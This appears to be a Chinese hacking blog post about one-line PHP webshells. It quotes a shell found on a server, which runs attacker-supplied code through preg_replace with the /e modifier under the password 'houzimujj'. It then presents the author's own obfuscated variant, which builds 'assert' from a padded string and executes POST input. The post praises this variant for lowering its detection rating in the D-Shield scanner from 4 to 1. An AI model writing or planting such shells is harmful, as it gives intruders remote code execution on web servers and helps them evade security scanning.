PHP一句话简单变种

<?php
@preg_replace('#(.*)#ies',preg_replace('/\{php.(.+)(?)\}/is','\\1',$_REQUEST['houzimujj']),null);
?>


上面这个代码是前两天在服务器上发现的,黑产牛都知道houzimujj这个密码。

原理很简单,就是个正则匹配替换而已。

可惜的是被D盾报了危险等级4。(D盾危险等级1~5,1最轻,5最重)

下面的一段是我自己简单写的变种,危险等级1

<?php
$str1 = '###'.$_POST[luo].'###';
$str2 = "######a##s##s###e####r###t";
$ch = substr($str1,0,1);
$c = str_replace($ch,"",$str1);
$e = str_replace($ch,"",$str2);
$e(base64_decode(base64_encode($c)));
?>

细看我这个简单到爆,效果却不同。有的时候简单不一定不好,对吧。

有图有真相!


本文由Hack Blog原创,如需转载注明原文链接

作者:test 分类:日常笔记 浏览:1853 评论:0
留言列表
发表评论
来宾的头像